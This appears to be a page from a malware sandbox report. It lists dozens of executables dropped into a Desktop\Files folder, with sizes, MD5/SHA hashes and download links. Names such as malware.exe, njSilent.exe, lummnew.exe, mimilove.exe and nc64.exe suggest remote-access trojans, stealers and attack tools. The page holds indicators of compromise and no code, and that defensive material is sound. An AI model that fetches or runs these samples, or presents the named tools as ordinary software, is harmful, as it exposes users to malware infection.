616b51fce27e45ac6370a4eb0ac463f6

SHA1
be425b40b4da675e9ccf7eb6bc882cb7dcbed05b

SHA256
ba22a9f54751c8fd8b2cfd38cc632bb8b75d54593410468e6ec75bdc0a076ae6

SHA512
7df000e6d4fe7add4370d3ac009717ce9343c4c0c4dbe32ceb23dc5269418c26fd339f7cf37ede6cb96ebe7e3ff1a6090a524f74f64485ba27bd13c893a169b2

Download Submit
C:\Users\Admin\Desktop\Files\XClient.exe

Filesize
64KB

MD5
713ca1f8ec4074b3ee385feded17e9cc

SHA1
bb3baa5440fbf87d097b27c60c7a95d53c85af02

SHA256
2a3514578e78c6d33ec89ed24f693c84804f0f10545779cd11626eedb7bdfc14

SHA512
8d16ade6aca158fad703bc9b1dd16af201efe629e39b5f86bbfdd524854a4783f1333c7e1820750d71ef299aef067ea01af4f0e0dbbadb15f657504845154557

Download Submit
C:\Users\Admin\Desktop\Files\XM.exe

Filesize
702KB

MD5
0940599cefe789664d6a032a27b25b73

SHA1
c6ee1fe58fdd7ba3c3f3d0e708228e53050cf4fa

SHA256
ed42c5f70c10694c1376f330cfbdcee52b72aed3b7eb25debcc1b2ba613c0922

SHA512
47c01da51b42cb086202d05f01613d81b75e37a8b718f13597a18d8693e3a6f8666d28d9c79abcd143d1d3c93d7a4051e551f4354306a7b57507967bc9adf781

Download Submit
C:\Users\Admin\Desktop\Files\XSploitLauncher.exe

Filesize
77KB

MD5
4bd68436e78a4a0f7bb552e349ab418f

SHA1
a1c4c57efd9b246d85a47c523b5e0436b8c24deb

SHA256
a52f8f78ba063951c3e315c562df187b90c257a61585e4682821abf6cefec957

SHA512
070ebca410b909d0e0ce4ba9a8119aa45de42e1c8cffc18916b070e2ad6012f40f1b0784c375e8100a987ce84e71e51da353444241f9301217f159681c3d1bbd

Download Submit
C:\Users\Admin\Desktop\Files\ZZZ.exe

Filesize
326KB

MD5
3663c34a774b45d65edb817e27dcbdae

SHA1
4e9333fbdc6540bc312f6b324df9eb7dafedde2e

SHA256
f203e00cfa3c0ff98670d56ace48c0ee7bf1a997309a8da1379d5291cbe37c3d

SHA512
88c4939f5c2613e7fa62040d3307f9fc0c2f2e0bae4c7c166d5fb6ee6b921c99636dc89935b31c60d4ba45afd5ebdd80ba51914cb37e9e2a604781de89e45c05

Download Submit
C:\Users\Admin\Desktop\Files\aaa.exe

Filesize
19KB

MD5
1318fbc69b729539376cb6c9ac3cee4c

SHA1
753090b4ffaa151317517e8925712dd02908fe9e

SHA256
e972fb08a4dcde8d09372f78fe67ba283618288432cdb7d33015fc80613cb408

SHA512
7a72a77890aa74ea272473018a683f1b6961e5e765eb90e5be0bb397f04e58b09ab47cfb6095c2fea91f4e0d39bd65e21fee54a0eade36378878b7880bcb9d22

Download Submit
C:\Users\Admin\Desktop\Files\ammyadmin.exe

Filesize
798KB

MD5
90aadf2247149996ae443e2c82af3730

SHA1
050b7eba825412b24e3f02d76d7da5ae97e10502

SHA256
ee573647477339784dcef81024de1be1762833a20e5cc2b89a93e47d05b86b6a

SHA512
eec32bb82b230dd309c29712e72d4469250e651449e127479d178eddbafd5a46ec8048a753bc2c1a0fdf1dc3ed72a9453ca66fb49cbf0f95a12704e5427182be

Download Submit
C:\Users\Admin\Desktop\Files\anne.exe

Filesize
45KB

MD5
1afe69dfd0013bf97a1ab941b6c5d984

SHA1
8dba7082cdcf8e0524a4300ca9ef437e281618ed

SHA256
33410cc8e262e90101e87a94f5cbc44c85adbe3a395fc683f99fd2ceb323cd2e

SHA512
e5629ba2be6567acfea94bcd10bdef48412074f4b8164436a4a4c28925b1d96e03f5f3640b56b2223a7ff686dde45fd5f446ef28278f3890102535340f41bb97

Download Submit
C:\Users\Admin\Desktop\Files\armadegon.exe

Filesize
941KB

MD5
f5b93d3369d1ae23d6e150e75d2b6a80

SHA1
6f6914770748ad148154e1576d9c6fe6887f2290

SHA256
343ea56746b6f08c7eccbfbb9fe1a544952a9a933140c677179f4f8c7bb60b81

SHA512
dcedaed2df62386b980cc1957f224fc48224aeb0f5bf8d0241acc7a0a552b0ae90697ed333189963540f8391cbecfa0977a8685723c5025c9a4f95918032cf1e

Download Submit
C:\Users\Admin\Desktop\Files\bildnewl.exe

Filesize
270KB

MD5
a1264b7a67771b5d0224d179edcd5a50

SHA1
56a87bc817e8ccff749c27bdf997eab1f5930174

SHA256
ab18f8db9ae857fe8a663d968223a605bfdc3a268b501a5d46eefa4495cbed6a

SHA512
39662f4edfd298220c97a8c621cf7bf2beeca91ce2694052138715cd5ed6c3702182dd9cee1c0ec746ca80efc9001e9e20d289649f2b65c1c2c10459f52ba2a0

Download Submit
C:\Users\Admin\Desktop\Files\bin.exe

Filesize
264KB

MD5
1dcce19e1a6306424d073487af821ff0

SHA1
9de500775811f65415266689cbdfd035e167f148

SHA256
77e14caae3daf05c1f5a6a3d10e4936cc58944d6ae9ec6943b1be6d995e94b5c

SHA512
4528efd164bff904830fde7efb04d5cf3999ef4fa0b8c3d4ad0407d7cd75f03085107c8ae5651e015f62e414a59979fd264e94257c52f60540d5969fd4ca144a

Download Submit
C:\Users\Admin\Desktop\Files\bqkriy6l.exe

Filesize
1.4MB

MD5
72a6fe522fd7466bf2e2ac9daf40a806

SHA1
b0164b9dfee039798191de85a96db7ac54538d02

SHA256
771d0ba5b4f3b2d1c6d7a5ebe9b395e70e3d125540c28f1a0c1f80098c6775ce

SHA512
b938a438e14458120316581cb1883579a2ce7f835b52f4ab1cde33aa85febcad11f8a8b0a23fb9a8acafa774fe9cbd1c804a02fd8e6f5d8df60924c351f0126e

Download Submit
C:\Users\Admin\Desktop\Files\build_2024-07-24_23-16.exe

Filesize
202KB

MD5
72bcb9136fde10fdddfaa593f2cdfe42

SHA1
17ef3b622d8a1c0cb0b4c0f2a41fdd1b4ac776dc

SHA256
bb38168a3222858c6b499dfceec3e3dc9055777b91869dbece107c241d97c436

SHA512
12f08e357049fdfcdd7dfe272d34b33926695383f201ba36041c3023872fe8679234668318244c2b91df95c65ec4a78c4fc4df651ffb061962c9732b0818cb06

Download Submit
C:\Users\Admin\Desktop\Files\build_2024-07-25_20-56.exe

Filesize
91KB

MD5
e412baacfab7fd0c729196efb37451ec

SHA1
ae8746ace97b85afbee1a92bc9948b79bc67c797

SHA256
23eb746c92547c562dc40113ed46fffd3a1e2910a91b07f0a15b2523504ecb3d

SHA512
a6ff160d37a11c79f8f4f326fd310113838951b6eb38a874441ddee0cf9b44b75cd0456c12ba5b53aee9cbac675bafd7e59a6f920906de81eca164eaf5f47f3d

Download Submit
C:\Users\Admin\Desktop\Files\build_2024-07-25_20-56.exe

Filesize
348KB

MD5
bea49eab907af8ad2cbea9bfb807aae2

SHA1
8efec66e57e052d6392c5cbb7667d1b49e88116e

SHA256
9b645f570116d3e10faa316981e4fcde6fe55417feced3385cfbb815c7df8707

SHA512
59486e18be6b85f5275c19f963d124f4f74c265b5b6dfa78c52f9243e444f40a7747a741ccb59bf1863ffb497321324c803fc967380900a6a2e0219eb99f387c

Download Submit
C:\Users\Admin\Desktop\Files\build_2024-07-27_00-41.exe

Filesize
255KB

MD5
112da2a1307ac2d4bd4f3bdb2b3a8401

SHA1
694bf7f0ea0ecfc172d9eb46f24bc2309bf47f4f

SHA256
217900ee9e96bcb152005818da2e5382cac579ab6edd540d05f2cdb8c8f4ce8b

SHA512
8455c8fb3f72eba5b3bf64452fb0f09c5fdc228cb121ca485a13daff9c8edef58ced1e23f986a3318d64c583b33a5e2c1b92220e10109812e35578968ed3b7a7

Download Submit
C:\Users\Admin\Desktop\Files\buildred.exe

Filesize
304KB

MD5
4e0235942a9cde99ee2ee0ee1a736e4f

SHA1
d084d94df2502e68ee0443b335dd621cd45e2790

SHA256
a0d7bc2ccf07af7960c580fd43928b5fb02b901f9962eafb10f607e395759306

SHA512
cfc4b7d58f662ee0789349b38c1dec0c4e6dc1d2e660f5d92f8566d49c4850b2bf1d70e43edf84db7b21cb8e316e8bcc3e20b797e32d9668c69a029b15804e3f

Download Submit
C:\Users\Admin\Desktop\Files\bundle.exe

Filesize
304KB

MD5
30daa686c1f31cc4833bd3d7283d8cdc

SHA1
70f74571fafe1b359cfe9ce739c3752e35d16cf5

SHA256
504518e3b4f3abc7f1ae1bf205fdc4a9f739e05b5e84618bae9c7e66bdc19822

SHA512
9f6c0eea9f03f9aa35ebf27ce8264e41d9072d273d1b8a35415ae4666d31013d895d1108dd67e36910200e2ac4fc45a4a9d761a1aadf02b0fd29ef93cd20a4d9

Download Submit
C:\Users\Admin\Desktop\Files\bwapp.exe

Filesize
2.3MB

MD5
17ba78456e2957567beab62867246567

SHA1
214fed374f370b9cf63df553345a5e881fd9fc02

SHA256
898db742c0c5503bc396a53b67b8a86da0722d51907c4be2beb364c2d578023a

SHA512
2165ba2aa0a0214f06bc31402bc2ea170d11032efc7ee56070b6abb0feb322b082ffd5dc5b2ad9841295ea85bd25826ba55fb00ed924fdb5ffd0f9f14d671eba

Download Submit
C:\Users\Admin\Desktop\Files\c1.exe

Filesize
547KB

MD5
2609215bb4372a753e8c5938cf6001fb

SHA1
ef1d238564be30f6080e84170fd2115f93ee9560

SHA256
1490105c73976217f35fe31d65939d1d9711d370c61f3d7d892afbb07eaaec63

SHA512
3892f3e4188250ab0d3508dd9c1825fa6dfab4fc50b4bc858703123e5512071d710fd8431f94912e74eaa4ca29b40c0b1b97805a5432a07fc09c35a87e6b23d2

Download Submit
C:\Users\Admin\Desktop\Files\cabal.exe

Filesize
100KB

MD5
8780b686df399f6ebd518bdc39c99027

SHA1
9b14eb76f87bb42845bdae321ce2c2a593686af4

SHA256
75207c4baaee7583c427df119c253e6a95c6a42b98e1902502a839f9879b42fe

SHA512
92a363be3f33ee2b805cb6133f2e35c3a13cd0e9c321eba8e9d39802e52df3a693c30e96f8e19496d57bc0124eea50f2548e90b64408a907d176f00473099238

Download Submit
C:\Users\Admin\Desktop\Files\cc2.exe

Filesize
314KB

MD5
ff5afed0a8b802d74af1c1422c720446

SHA1
7135acfa641a873cb0c4c37afc49266bfeec91d8

SHA256
17ac37b4946539fa7fa68b12bd80946d340497a7971802b5848830ad99ea1e10

SHA512
11724d26e11b3146e0fc947c06c59c004c015de0afea24ec28a4eb8145fcd51e9b70007e17621c83f406d9aeb7cd96601245671d41c3fcc88a27c33bd7cf55ac

Download Submit
C:\Users\Admin\Desktop\Files\client.exe

Filesize
1.8MB

MD5
126619fbbb061d7f4e5a595068249ce8

SHA1
97bce4d9b978f39b2695b4e3cd24b027f10de317

SHA256
f2e4a4a886757ce7e2492cbc509d2d29fad5674d037482057f3ee77986892198

SHA512
9ed6c43a15c6fc2c601a9151f65847f1f661fb9a8fff75d2c5d50ffd5d5d65c24459a6ef23d62e1196b05dcfca5af8c9522b3cc2622d5149e1815f6c3ebcd514

Download Submit
C:\Users\Admin\Desktop\Files\clip.exe

Filesize
507KB

MD5
6ca0b0717cfa0684963ff129abb8dce9

SHA1
69fb325f5fb1fe019756d68cb1555a50294dd04a

SHA256
2500aa539a7a5ae690d830fae6a2b89e26ba536f8751ba554e9f4967d48e6cfa

SHA512
48f9435cf0a17aed8ff4103fa4d52e9c56f6625331a8b9627b891a5ccada14f14c2641aac6a5c09570f26452e5416ac28b31fe760a3f8ba2f5fe9222d3c336ee

Download Submit
C:\Users\Admin\Desktop\Files\crazyCore.exe

Filesize
33.2MB

MD5
4207460f8628bd200838276b4ee16156

SHA1
8eb671ff2c0ebf57aa98f90a5e11e2cb837a6906

SHA256
ee59a995be20b18582e8a3fb8bbf337199626d2043e3e6b02d619b7ecc68116d

SHA512
54b5dfd66e1c9e8f69b208b4dd0410b3c1b283034a77f1af469bca4affcebb78ccb04e1b6775ea4eba94c971a8e892887d04c1150ffb5e3ad09d3186da489ac8

Download Submit
C:\Users\Admin\Desktop\Files\crss.exe

Filesize
40KB

MD5
3ab61ee8a81099edddf87af587420a10

SHA1
d6c0f6f60d13cc786cf7ac0df2c45b5dc47b945c

SHA256
feba3474a30f9b010741c34ee4773777fc329390418713ffef424b2eb9243a5f

SHA512
f43326c79ea8bd118fd90efc8c2c8306e02901727ffd7c6666b2a35820eb8799976007f4886a68a7f411509ad61dcf7ddf5a3630fa5342014ad5aa978818ff3f

Download Submit
C:\Users\Admin\Desktop\Files\cryptography_module_windows.exe

Filesize
7.8MB

MD5
ec69806113c382160f37a6ace203e280

SHA1
4b6610e4003d5199bfe07647c0f01bea0a2b917a

SHA256
779a5fe11a1db6a3b4a064a57106c126b306a027b89200c72744eeac0db0bfe2

SHA512
694d1a907abe03bef1d0f39679b920fdb8e14ebf3443d56defedbf31f8fa7458a89d547c9e9c315cdd226f614d1e436afd52622c119cb9d83d9751ff7854c946

Download Submit
C:\Users\Admin\Desktop\Files\cudo.exe

Filesize
1.0MB

MD5
3bcf37b4d029d825d91a9295a1365eab

SHA1
8564ae5c5f8d842ac36ad45b3321b5b3f026ddf0

SHA256
a08ee121eaa50ed3597411cc1a3ed71096b3b4a344604da6d639cd2cce506d31

SHA512
df9fe8960be8f75d5b3c70d452c72516f1e0ad8451b335ae5925dbb822685aba053ea1402f2a25180c36685c4a51b9ead81cc8ab5118c08c93e798a666caaaa7

Download Submit
C:\Users\Admin\Desktop\Files\drchoe.exe

Filesize
1.5MB

MD5
2a601bbfbfc987186371e75c2d70ef4e

SHA1
791cd6bdac91a6797279413dc2a53770502380ca

SHA256
204e8268d98a3584e7fda52820025c6b681fd5dca6da726512d3ea97fb4510d5

SHA512
1c3c6a4da8448fecaf917ca586ee6e069733c16e3477734b7548863dc81aa9ef9112a648fd38e3ea527766a19a9aac925c3a4d3531784ae9111386721bc79f3e

Download Submit
C:\Users\Admin\Desktop\Files\dsds.exe

Filesize
2.7MB

MD5
44bfe82d2a51a9683be239862885e68e

SHA1
6bd6644818b00cde8147ee6fdfa42c89ad160ff0

SHA256
b1a7d59539e789763e967266520191c1c5e76671d3955caf69eb8491952b14d9

SHA512
e6534a42d85d49e581587798d83c6c2ad5b56a71b4628c43a0f028244d0fb5f0d1ec6163cc4f6ff4898450e5298961a788d4191284b8b0ceace11cf9d7b51bc6

Download Submit
C:\Users\Admin\Desktop\Files\elm.exe

Filesize
4.1MB

MD5
42a5c60fadb3b94505babe3561507a50

SHA1
ade46a914ffefa4b1d8b791fbfdf07531c362e44

SHA256
a39cb2c31b6724eaa78f60fe29ced83e50ffad7e39efd604a7debdac63a2a80e

SHA512
d98f41807a0fa8edb5a2f2b054985d753e18deaa06e768045dcab7a108e15ae95dabb0c35506e652dd61d039da43d71d9576638d3ec85ffe46d21e4d18285611

Download Submit
C:\Users\Admin\Desktop\Files\esphvcion.exe

Filesize
9.0MB

MD5
236052d31ea3dcec7e126b3a4b1bfe28

SHA1
cfac72282350d17a03bc1bb6bd63200b2f8af823

SHA256
7f5296f1c5227418ffb148048a4f51d2506d621d3ce07a628ff42734789b384b

SHA512
99d26b2b7b272d5af14f98612e155f964d7cb8acd200a696f5c63cfd34e394c049e66f2cb05657866dae5f9c4cdde207e830cc0afc654c6325a8f5adc2504483

Download Submit
C:\Users\Admin\Desktop\Files\ew.exe

Filesize
55KB

MD5
d76e1525c8998795867a17ed33573552

SHA1
daf5b2ffebc86b85e54201100be10fa19f19bf04

SHA256
f4dd44bc19c19056794d29151a5b1bb76afd502388622e24c863a8494af147dd

SHA512
c02e1dcea4dc939bee0ca878792c54ff9be25cf68c0631cba1f15416ab1dabcd16c9bb7ad21af69f940d122b82880b1db79df2264a103463e193f8ae157241dd

Download Submit
C:\Users\Admin\Desktop\Files\ewrvuh.exe

Filesize
2.8MB

MD5
bda1e244f73c16499b8faa763e79cc52

SHA1
f6b599b144c1a792681624cbbaf277352f175d55

SHA256
c1de42382bc44f0871f0fe67c18d669a57291deace62b9c27f7ad76872231886

SHA512
e8291e34976516e9a04eddfd82fbfd5eac1cbb8887b83e6cfb5c764992079d4139f9ef6aa3ae8fd3716aa6e221d1aa352f1472c7579636b5634071940066fd10

Download Submit
C:\Users\Admin\Desktop\Files\file1.exe

Filesize
10KB

MD5
a107fbd4b2549ebb3babb91cd462cec8

SHA1
e2e9b545884cb1ea0350a2008f61e2e9b7b63939

SHA256
5a9b441d59e7ac7e3bdc74a11ed13150aecbf061b3e6611e2e10d11cd232c5d2

SHA512
05b13ba83b7c0c6a722d4b583a6d9d27e2b3a53002c9c4d6108a712d0d5ccc703580e54841767d0a2d182a3bc60d9c6390065aefd1774316c526f71918f142db

Download Submit
C:\Users\Admin\Desktop\Files\gagagggagagag.exe

Filesize
65KB

MD5
7f20b668a7680f502780742c8dc28e83

SHA1
8e49ea3b6586893ecd62e824819da9891cda1e1b

SHA256
9334ce1ad264ddf49a2fe9d1a52d5dd1f16705bf076e2e589a6f85b6cd848bb2

SHA512
80a8b05f05523b1b69b6276eb105d3741ae94c844a481dce6bb66ee3256900fc25f466aa6bf55fe0242eb63613e8bd62848ba49cd362dbdd8ae0e165e9d5f01c

Download Submit
C:\Users\Admin\Desktop\Files\ggg.exe

Filesize
7.5MB

MD5
50242f37a1fb1673af2619b7d8595dcd

SHA1
f9301a1b4a072a625ef2e898dfcbdbc8e6735c9f

SHA256
e82797a9b4a8fcc80f7a4521719d313119cc408b867b721a79f5967cdbac8a8c

SHA512
bb8622c9698e92723fab060ccbb022304e6d00601dadbc5d5e5d5a185a430fafad982c090a813a7a1424d4309cfd810fcd4eb382ef2afa7a8347820de19b2c15

Download Submit
C:\Users\Admin\Desktop\Files\h5a71wdy.exe

Filesize
2.7MB

MD5
f61b9e7a0284e3ce47a55b657ec1eb3e

SHA1
c092203f29f5c4674f11a31d12864d360242bd2b

SHA256
94e5157b6ff083bb4cfeaae25af93649f6b6ae1c7d9ef119083d084e737dd1f2

SHA512
9c7d5b3020d7e8b35efaeef7d2f8641e82be5368b33089cbdb1fe700a4421ff1fcf79103537bd0f408d762e90333dfec747684a67a6818ba3929d466e745fe98

Download Submit
C:\Users\Admin\Desktop\Files\j4vzzuai.exe

Filesize
629KB

MD5
f8b9bbe568f4f8d307effddb44d4c6b3

SHA1
4bd7686eca3eeaffe79c4261aef9cebee422e8fd

SHA256
50104b13a245621a1a0291eac4f9eb9c010fae46cc511b936d6f3b42a398cab3

SHA512
56c692e195771b02f9cf45786b233e2d996561360a5402577651a67c538c94a5f3e58925ba6e671515a8dd0dbcf1c0917b53d86d5ae6d2bc8dfd30ed5e60b9bf

Download Submit
C:\Users\Admin\Desktop\Files\jb4w5s2l.exe

Filesize
490KB

MD5
9b8a01a85f7a6a8f2b4ea1a22a54b450

SHA1
e9379548b50d832d37454b0ab3e022847c299426

SHA256
3a8d25489569e653336328538ff50efcd5b123ceeb3c6790211e2e546a70ce39

SHA512
960ba08c80d941205b1c2b1c19f2c4c3294118323097019f1cfc0300af9c8f2c91661fa1817a5573e37c0cdf3cae1f93c91b2934353709999c9efb05cda2130f

Download Submit
C:\Users\Admin\Desktop\Files\jdkashk.exe

Filesize
4.5MB

MD5
5ce850d91d128f6ba12cb75575b6879b

SHA1
2895d37f1bec823e7610f8b18c687ae7504d52c2

SHA256
44920254e68b63c9c0ea4e2aaf885a817f6f4741e3e2c042947eb790431e7fc9

SHA512
888b526dec6929fc2a79344b638d74f84b035b08a52cfbe5793c7dc51584868327f70d99d146f7ae8c8fd3506a1b8007905b3c9df3e1ed490caf9b11f938d590

Download Submit
C:\Users\Admin\Desktop\Files\kdmapper_Release.exe

Filesize
143KB

MD5
6d7f8dfdd94db8908daed972026a6bbf

SHA1
2104231cf6350606b11452c297250d339b9e2b0f

SHA256
46a726f0763d7c4d32db62c6d5459b87dd7c1262cbcd7f3659de70a51af97c1a

SHA512
056c65c7a44dbbdfa9bb4d70ec184c1e07604cd44f0bbae71da33d891ea5af22311e038c89fe44f5bb8fcbd794fbd8a206975ca55eb3d82834e086336f8564a4

Download Submit
C:\Users\Admin\Desktop\Files\kg.exe

Filesize
58KB

MD5
ed8c78a13d8e1f2fa403ed013f9bdeca

SHA1
b5f5e21b3e845dc9d16c3670627a50f3530ae52f

SHA256
7b2caa5017640cc39e49b35cf91bf4d2c1d94ec168603e26c1d60e7649ec559f

SHA512
fed3ba676bc3d7cc5888a28d3acecc2b860e30e12a3ac7209786f25269028552f62439df171c38328936f48fd8bf041ffd0496034eb44bd6258dbd95c61f147b

Download Submit
C:\Users\Admin\Desktop\Files\khtoawdltrha.exe

Filesize
1.2MB

MD5
21eb0b29554b832d677cea9e8a59b999

SHA1
e6775ef09acc67f90e07205788a4165cbf8496ca

SHA256
9aaa862061c903f3f5a1d509f0016a599b9152d02ea0365dfd3bbd9c5c147656

SHA512
e7434e0d46e37e4a76bd8e394063a3ac531892b972347b3de8aa71689ded1ce4968b1a1defda720af4cfa66037390cbe771105e7bf892ef640cbee12e862e742

Download Submit
C:\Users\Admin\Desktop\Files\kill.exe

Filesize
13KB

MD5
789f1016740449ce3e9a7fe210383460

SHA1
e0905d363448178d485ed15ee6f67b0f1d72e728

SHA256
71068065d8dd7daa9c49687b973d05d5602ed994467728763d2213fe4d90c0d8

SHA512
b63467a55f11f8e3e6dfee195e5a64d7dec621834e1c26e1f64210496dbad36409771968a5e3b2f142fb6196df5689c012f5971ca2fd4bb3b1311f8f66f2f2fa

Download Submit
C:\Users\Admin\Desktop\Files\kitty.exe

Filesize
319KB

MD5
0ec1f7cc17b6402cd2df150e0e5e92ca

SHA1
8405b9bf28accb6f1907fbe28d2536da4fba9fc9

SHA256
4c5ca5701285337a96298ebf994f8ba013d290c63afa65b5c2b05771fbbb9ed4

SHA512
7caa2416bc7878493b62a184ddc844d201a9ab5282abfa77a616316af39ff65309e37bb566b3e29d9e764e08f4eda43a06464acaf9962f911b33e6dbc60c1861

Download Submit
C:\Users\Admin\Desktop\Files\kiyan.exe

Filesize
304KB

MD5
44e17821665477b21d6c50cee97c84ef

SHA1
4fc146790747758f49f1fd4375144f000099a6cb

SHA256
5adac427a6eff8b0c1674c6095e2719d5ee46945fd4e397384af02b8ec691045

SHA512
ab98a8151b41b56d7e59c375541c366df2f83c01ee26a5d1f079f74fb69eac4d229df62d3900eb8db6fd8cae1e420c21b7b9b2b3a44a8b135cb6659b6b70b6dc

Download Submit
C:\Users\Admin\Desktop\Files\kp8dnpa9.exe

Filesize
731KB

MD5
7cd7bd7b855fb4c89818486930303c23

SHA1
866d236d0ead14107b82b04d3a03a96a8af6f6ae

SHA256
b45aad3cf4b75c3afb9fc6e496a33e0e67364f9e0bc484d1f467e86bc08cc413

SHA512
913f887d734d83126721bb0758a31aec2f476a4a20233a4931cbe7441a96140d062eb6febf3977327fedfbae6d5f827add0838887c5ea804599547b4717328aa

Download Submit
C:\Users\Admin\Desktop\Files\langla.exe

Filesize
45KB

MD5
24fbdb6554fadafc115533272b8b6ea0

SHA1
8c874f8ba14f9d3e76cf73d27ae8806495f09519

SHA256
1954e0151deb50691b312e7e8463bd2e798f78ff0d030ce1ef889e0207cc03aa

SHA512
155853c0d8706b372ba9bc6bce5eb58e8bd332fd30900b26c4f3cc7d1e769259bc1c79eeca1ad72830cee06b79500cea12636b865bf8b571c4a790fbb1bbd7da

Download Submit
C:\Users\Admin\Desktop\Files\legas.exe

Filesize
1.4MB

MD5
e6d27b60afe69ac02b1eaec864c882ae

SHA1
a72b881867b7eaa9187398bd0e9e144af02ffff4

SHA256
aac36ff20ea7bfc0591c1d6b145b456bad394ee8e619343ec10d1809188edd75

SHA512
4f11fc2b36589fc9ff7dc5afd27cb91614f6a89bfd60942baebef025f53cb56ed7413abeff57fc7c85b3a2a4b0feec2649d5c5a856d3e2e9c13f6a0d8c777764

Download Submit
C:\Users\Admin\Desktop\Files\lummnew.exe

Filesize
94KB

MD5
9a4cc0d8e7007f7ef20ca585324e0739

SHA1
f3e5a2e477cac4bab85940a2158eed78f2d74441

SHA256
040d121a3179f49cd3f33f4bc998bc8f78b7f560bfd93f279224d69e76a06e92

SHA512
54636a48141804112f5b4f2fc70cb7c959a041e5743aeedb5184091b51daa1d1a03f0016e8299c0d56d924c6c8ae585e4fc864021081ffdf1e6f3eab11dd43b3

Download Submit
C:\Users\Admin\Desktop\Files\m.exe

Filesize
96KB

MD5
930c41bc0c20865af61a95bcf0c3b289

SHA1
cecf37c3b6c76d9a79dd2a97cfc518621a6ac924

SHA256
1f2e9724dfb091059ae16c305601e21d64b5308df76ddef6b394573e576ef1ff

SHA512
fa1f33c71da608b3980038981220fcebee0b0cc44331e52f5198dd2761c97631ee8286756c2cc16245a1370c83bb53cc8ea8ef64e0fcdd30af51f023973986b2

Download Submit
C:\Users\Admin\Desktop\Files\major.exe

Filesize
1.6MB

MD5
fa3d03c319a7597712eeff1338dabf92

SHA1
f055ba8a644f68989edc21357c0b17fdf0ead77f

SHA256
a08db4c7b7bacc2bacd1e9a0ac7fbb91306bf83c279582f5ac3570a90e8b0f87

SHA512
80226bb11d56e4dc2dbc4fc6aade47db4ca4c539b25ee70b81465e984df0287d5efcadb6ec8bfc418228c61bd164447d62c4444030d31655aaeed342e2507ea1

Download Submit
C:\Users\Admin\Desktop\Files\malware.exe

Filesize
2.8MB

MD5
cb00a7da987df0007646cebbb5b3767d

SHA1
e8572fc68ebcda5f576ca8ed64f3e0794f5a05e1

SHA256
eeadb031ff7206f0bc0e13c7babd7ad594f2f37d5a0119e7a3cb0d7694c5f1cc

SHA512
6d095da178f2b8cb46c0255c427875d752f40b446ba44770a19c869e53c19fcac52b03728d6c6b4991be0cddedc4ef89c6f7673b25bc66bf1aea528ffd773a95

Download Submit
C:\Users\Admin\Desktop\Files\maza-0.16.3-win64-setup-unsigned.exe

Filesize
15.0MB

MD5
3bcb9a06b0a213eef96cbd772f127a48

SHA1
359470a98c701fef2490efb9e92f6715f7b1975e

SHA256
563f37e8208427a38cde013f785d2a4cbb9aac29e93dc1233d28b9762d3eddec

SHA512
60431dd4aa91c43dadfbcb698cf1b6590b098fbd3b41c37fdcc22dc13a9a9085cfd38182bbbc9ef68a22070029d7613359d938a8fe6827ae7107376ded8022ba

Download Submit
C:\Users\Admin\Desktop\Files\mimilove.exe

Filesize
24KB

MD5
c67f3497c310c01018f599b3eebae99e

SHA1
d73e52e55b1ad65015886b3a01b1cc27c87e9952

SHA256
cc585d962904351ce1d92195b0fc79034dc3b13144f7c7ff24cd9f768b25e9ef

SHA512
1205b5a9a9d2f3fabcce7e53e70e4efce08b21469ae64120beaee67a828d12eeeecddc623b453105ed15990fcc7bbce53175eca6545007f9d68c0aee66e55bc0

Download Submit
C:\Users\Admin\Desktop\Files\minecraft.exe

Filesize
55KB

MD5
09718d571b01cb93e6f983be7b99a4b2

SHA1
d2d1212212bfc691e115b24e8132ae4658e510e8

SHA256
6eb25168bde4a9e7f3a273229ca0fbf4f17133788b5c68bf3151eb48826e1169

SHA512
9c7fad95ad56c1f457be067467886c7d23fa57734547688c64d16f37f3190cc017987278a2387b217e4a8108ac04d33b1fe5353cfb350717a839ecb6dd533098

Download Submit
C:\Users\Admin\Desktop\Files\morphic.exe

Filesize
538KB

MD5
b5f31f1c9a5f7ed6445e934c0519e4ba

SHA1
e2f631bfb8c0ddedf43e270e31fc7dcf0fa6ed34

SHA256
b01f683b4f33b05ac3421d8d31fe59d2196660ec611ba089d0f6392065c25bcb

SHA512
3e297397e693db0f2a005ce1c9a3293c074f16670d29f54d03aed7c87f1b540b1ff8da5cd1c49ef064acf34a448223de0b6403c66e7d5ffc4a2c8d15a99c1fb5

Download Submit
C:\Users\Admin\Desktop\Files\nc64.exe

Filesize
44KB

MD5
523613a7b9dfa398cbd5ebd2dd0f4f38

SHA1
3e92f697d642d68bb766cc93e3130b36b2da2bab

SHA256
3e59379f585ebf0becb6b4e06d0fbbf806de28a4bb256e837b4555f1b4245571

SHA512
2ca42e21ebc26233c3822851d9fc82f950186820e10d3601c92b648415eb720f0e1a3a6d9d296497a3393a939a9424c47b1e5eaedfd864f96e3ab8986f6b35b5

Download Submit
C:\Users\Admin\Desktop\Files\newbundle2.exe

Filesize
304KB

MD5
58e8b2eb19704c5a59350d4ff92e5ab6

SHA1
171fc96dda05e7d275ec42840746258217d9caf0

SHA256
07d4b7768e13d79ac5f05f81167b29bb6fbf97828a289d8d11eec38939846834

SHA512
e7655762c5f2d10ec246d11f82d437a2717ad05be847b5e0fd055e3241caaca85430f424055b343e3a44c90d76a0ba07a6913c2208f374f59b61f8aa4477889f

Download Submit
C:\Users\Admin\Desktop\Files\newfile.exe

Filesize
392KB

MD5
a896758e32aa41a6b5f04ed92fe87a6c

SHA1
e44b9c7bfd9bab712984c887913a01fbddf86933

SHA256
7664288e924fecf085d750dbd40c405bd0dbc9d1ed662c5ecf79c636976e867c

SHA512
e6ca9818c394fd3cbbb4f21141c40d5cab3c16a82c96435ea1133eabbb44cc954d022dc6cbd13200d08d5ce8d905c3b933b3edf52eeacca858dfd3d6a3866021

Download Submit
C:\Users\Admin\Desktop\Files\ngrok.exe

Filesize
45.9MB

MD5
2699ed82d2aad10c587e227c168f1386

SHA1
562806f4fc15723dd1f8d21daf43d641af1df894

SHA256
a0f02163062dc25ce4a8256570427fc761855a3189b0650986eedc1f2770f552

SHA512
d2c87e1c1b5b8e42f2db9411566ff22fec7bc7efe639408e231f5e76a1285b8fbd154d0b42e7fb1a7bcfb35332f873ca0af2a49eb87cdc331bf9bfb6fef91cff

Download Submit
C:\Users\Admin\Desktop\Files\njSilent.exe

Filesize
37KB

MD5
e20a459e155e9860e8a00f4d4a6015bf

SHA1
982fe6b24779fa4a64a154947aca4d5615a7af86

SHA256
d6ee68c0057fd95a29a2f112c19cb556837eff859071827bc5d37069742d96cc

SHA512
381a3c27328e30a06125c2fa45334ca84aaff7904afb032e4fd6dec1474179787f0d87e93804b7b79e74987e2977ea19d64de05872c7f4fe1ca818199ed30d02

Download Submit
